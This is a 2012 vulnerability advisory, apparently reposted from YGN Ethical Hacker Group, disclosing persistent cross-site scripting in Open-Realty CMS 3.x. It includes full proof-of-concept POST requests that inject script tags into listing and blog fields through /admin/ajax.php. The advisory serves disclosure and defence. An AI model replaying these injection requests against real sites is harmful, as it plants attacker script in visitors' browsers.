Open-Realty CMS 3.x Persistent Cross Site Scripting (XSS)

2012.12.26
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

1. OVERVIEW Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site Scripting (XSS). 2. BACKGROUND Open-Realty is the world's leading real estate listing marketing and management CMS application, and has enjoyed being the real estate web site software of choice for professional web site developers since 2002. 3. VULNERABILITY DESCRIPTION Multiple parameters are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 3.x 5. PROOF-OF-CONCEPT/EXPLOIT /admin/ajax.php (parameter: title, full_desc, ta) /////////////////////////////////////////////////////// POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1 Host: localhost Content-Length: 574 Origin: http://localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7; edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2&notes=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate= /////////////////////////////////////////////////////// POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 112 Origin: http://localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65 Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09; blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us /////////////////////////////////////////////////////// 6. SOLUTION The vendor has not responded to the report since 2012-11-17. It is recommended that an alternate software package be used in its place. 7. VENDOR Transparent Technologies Inc. http://www.transparent-support.com 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-11-17: Vulnerability Reported 2012-12-25: Vulnerability Disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss Open-Realty Home Page: http://www.open-realty.org/ #yehg [2012-12-25]

References:

http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top